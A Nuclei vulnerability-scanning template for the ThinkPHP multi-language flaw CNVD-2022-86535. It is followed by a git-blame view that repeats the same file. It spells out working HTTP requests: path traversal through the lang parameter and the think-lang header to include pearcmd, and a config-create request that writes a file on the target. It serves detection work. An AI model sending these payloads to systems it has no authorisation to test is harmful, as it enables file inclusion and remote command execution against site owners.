nuclei-templates/http/cnvd/2022/CNVD-2022-86535.yaml

id: CNVD-2022-86535

info:
  name: Thinkphp Multi Languag- File Inc And RCE
  author: arliya,ritikchaddha
  severity: high
  description: |
    ThinkPHP has a command execution vulnerability because the multi-language function is enabled and the parameter passing of parameter lang is not strictly filtered. Attackers can use this vulnerability to execute commands.
  reference:
    - https://cn-sec.com/archives/1465289.html
    - https://blog.csdn.net/qq_60614981/article/details/128724640
    - https://www.cnvd.org.cn/flaw/show/CNVD-2022-86535
  metadata:
    verified: true
  tags: cnvd,cnvd2022,thinkphp,rce

http:
  - raw:
      - |
        GET /?lang=../../../../../usr/local/php/pearcmd HTTP/1.1
        Host: {{Hostname}}

      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        think-lang: ../../../../../usr/local/php/pearcmd

      - |
        GET /?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/safedog()+{{rand_base(10)}}.log HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: or
    matchers:
      - type: word
        part: set_cookie
        words:
          - "think_lang=..%2F..%2F..%2F..%2F"

      - type: word
        part: body_3
        words:
          - "CONFIGURATION"
          - "Successfully created"
        condition: and
re-write template 2023-06-19 10:41:59 +00:00			`id: CNVD-2022-86535`

			`info:`
			`name: Thinkphp Multi Languag- File Inc And RCE`
			`author: arliya,ritikchaddha`
			`severity: high`
			`description: \|`
			`ThinkPHP has a command execution vulnerability because the multi-language function is enabled and the parameter passing of parameter lang is not strictly filtered. Attackers can use this vulnerability to execute commands.`
			`reference:`
added ref & metadata, fix lint 2023-06-19 10:46:36 +00:00			`- https://cn-sec.com/archives/1465289.html`
			`- https://blog.csdn.net/qq_60614981/article/details/128724640`
re-write template 2023-06-19 10:41:59 +00:00			`- https://www.cnvd.org.cn/flaw/show/CNVD-2022-86535`
added ref & metadata, fix lint 2023-06-19 10:46:36 +00:00			`metadata:`
			`verified: true`
re-write template 2023-06-19 10:41:59 +00:00			`tags: cnvd,cnvd2022,thinkphp,rce`

			`http:`
			`- raw:`
			`- \|`
			`GET /?lang=../../../../../usr/local/php/pearcmd HTTP/1.1`
			`Host: {{Hostname}}`

			`- \|`
			`GET / HTTP/1.1`
			`Host: {{Hostname}}`
			`think-lang: ../../../../../usr/local/php/pearcmd`

			`- \|`
			`GET /?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/safedog()+{{rand_base(10)}}.log HTTP/1.1`
			`Host: {{Hostname}}`

			`matchers-condition: or`
			`matchers:`
added ref & metadata, fix lint 2023-06-19 10:46:36 +00:00			`- type: word`
			`part: set_cookie`
			`words:`
			`- "think_lang=..%2F..%2F..%2F..%2F"`
re-write template 2023-06-19 10:41:59 +00:00
added ref & metadata, fix lint 2023-06-19 10:46:36 +00:00			`- type: word`
			`part: body_3`
			`words:`
			`- "CONFIGURATION"`
			`- "Successfully created"`
			`condition: and`